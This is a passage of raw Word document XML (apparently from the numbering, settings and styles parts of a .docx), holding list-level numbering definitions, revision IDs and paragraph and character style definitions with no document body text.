      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="339C34A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="31B0AC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34C3643A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="857C73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389A3D70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2B1E9936"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="552" w:hanging="552"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1272" w:hanging="552"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7560" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="42AD5EA9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="74F8A7F0"/>
    <w:lvl w:ilvl="0" w:tplc="402C3BEA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D492A08C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A3E4DD10">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5766503A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="59D6C57A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="80E07A08">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F070B4AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7ED29EAC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="DA3EFC38">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="568AC229"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD7CEB26"/>
    <w:lvl w:ilvl="0" w:tplc="B7BC4EE0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="72B02F24">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E782ECAC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="44BA08F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="77F0A466">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="727EC7B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A838201C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="1494CA7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B4A8219A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5CC11354"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5DB693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792CECBF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AA5AA8A6"/>
    <w:lvl w:ilvl="0" w:tplc="8F065DCC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E7706054">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="CA385FCA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2B1E789E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C2ACF4E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0DEA2EF4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A31C0D1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="79CC2508">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E576A426">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7B5C4525"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AA6A15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7E93296C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BDAE63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667132237">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="699353987">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1590653638">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1484156986">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2087916448">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="722679596">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="366488402">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1014769216">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1520894180">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="927999755">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="17240109">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="387539155">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1661884353">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200"/>
  <w:embedTrueTypeFonts/>
  <w:saveSubsetFonts/>
  <w:trackRevisions w:val="false"/>
  <w:defaultTabStop w:val="7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EE7"/>
    <w:rsid w:val="000E4AEB"/>
    <w:rsid w:val="001117A7"/>
    <w:rsid w:val="001659D9"/>
    <w:rsid w:val="00214407"/>
    <w:rsid w:val="00285D58"/>
    <w:rsid w:val="00296936"/>
    <w:rsid w:val="003566BB"/>
    <w:rsid w:val="003B008C"/>
    <w:rsid w:val="00421A11"/>
    <w:rsid w:val="004336CF"/>
    <w:rsid w:val="00505B29"/>
    <w:rsid w:val="005F7A8F"/>
    <w:rsid w:val="00600D56"/>
    <w:rsid w:val="00637646"/>
    <w:rsid w:val="00754D8F"/>
    <w:rsid w:val="00757A7D"/>
    <w:rsid w:val="00757DFD"/>
    <w:rsid w:val="007921FA"/>
    <w:rsid w:val="007D66BC"/>
    <w:rsid w:val="00807D45"/>
    <w:rsid w:val="0081210C"/>
    <w:rsid w:val="00847951"/>
    <w:rsid w:val="008B7474"/>
    <w:rsid w:val="00904CE2"/>
    <w:rsid w:val="0091271D"/>
    <w:rsid w:val="00950EE7"/>
    <w:rsid w:val="00991116"/>
    <w:rsid w:val="009A6EDB"/>
    <w:rsid w:val="009C0C9D"/>
    <w:rsid w:val="009E11FA"/>
    <w:rsid w:val="009F5E5E"/>
    <w:rsid w:val="00A44022"/>
    <w:rsid w:val="00A901F9"/>
    <w:rsid w:val="00AC7EC6"/>
    <w:rsid w:val="00B20A5F"/>
    <w:rsid w:val="00B20B4A"/>
    <w:rsid w:val="00B31831"/>
    <w:rsid w:val="00B44972"/>
    <w:rsid w:val="00BD212D"/>
    <w:rsid w:val="00C470A8"/>
    <w:rsid w:val="00D112F1"/>
    <w:rsid w:val="00D20F96"/>
    <w:rsid w:val="00D4785E"/>
    <w:rsid w:val="00ED5445"/>
    <w:rsid w:val="00F5281F"/>
    <w:rsid w:val="00F55EA9"/>
    <w:rsid w:val="00F569F7"/>
    <w:rsid w:val="00F62E6B"/>
    <w:rsid w:val="00F82F3C"/>
    <w:rsid w:val="00FE6445"/>
    <w:rsid w:val="06482D2A"/>
    <w:rsid w:val="0B354A0E"/>
    <w:rsid w:val="14B1A8E4"/>
    <w:rsid w:val="21DEE400"/>
    <w:rsid w:val="27C05D57"/>
    <w:rsid w:val="2DA0BFCE"/>
    <w:rsid w:val="37ADEEA7"/>
    <w:rsid w:val="393AB2E7"/>
    <w:rsid w:val="43E44A0D"/>
    <w:rsid w:val="4A6789A9"/>
    <w:rsid w:val="4A760F04"/>
    <w:rsid w:val="4C7066F3"/>
    <w:rsid w:val="4EB71C98"/>
    <w:rsid w:val="5131D9B8"/>
    <w:rsid w:val="51481330"/>
    <w:rsid w:val="55EEB8DF"/>
    <w:rsid w:val="5DE697EB"/>
    <w:rsid w:val="7121577F"/>
    <w:rsid w:val="7288B415"/>
    <w:rsid w:val="76BE3725"/>
    <w:rsid w:val="791AF77C"/>
    <w:rsid w:val="79C6680D"/>
    <w:rsid w:val="7C7FAE75"/>
    <w:rsid w:val="7C85D1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604F3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6F2785B1-12D8-B840-B589-406268F52B3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4"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        <w14:ligatures w14:val="standardContextual"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>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7288B415"/>
    <w:pPr>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="7288B415"/>
    <w:pPr>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00950E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50E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50E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50EE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0EE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0EE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0EE7"/>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9"/>
    <w:rsid w:val="7288B415"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading2Char" w:customStyle="1">
    <w:name w:val="Heading 2 Char"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="7288B415"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading3Char" w:customStyle="1">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00950EE7"/>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950EE7"/>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950EE7"/>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950EE7"/>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950EE7"/>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950EE7"/>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950EE7"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="06482D2A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="TitleChar" w:customStyle="1">
    <w:name w:val="Title Char"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="06482D2A"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="06482D2A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtitleChar" w:customStyle="1">
    <w:name w:val="Subtitle Char"/>
    <w:link w:val="Subtitle"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="06482D2A"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="minorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="00950EE7"/>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950EE7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00950EE7"/>
    <w:pPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00950EE7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00950EE7"/>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950EE7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00950EE7"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="paragraph" w:customStyle="1">
    <w:name w:val="paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00637646"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:ind w:left="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="normaltextrun" w:customStyle="1">
    <w:name w:val="normaltextrun"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00637646"/>
  </w:style>
  <w:style w:type="character" w:styleId="eop" w:customStyle="1">
    <w:name w:val="eop"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00637646"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="06482D2A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="06482D2A"/>
    <w:rPr>
      <w:color w:val="467886"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="06482D2A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
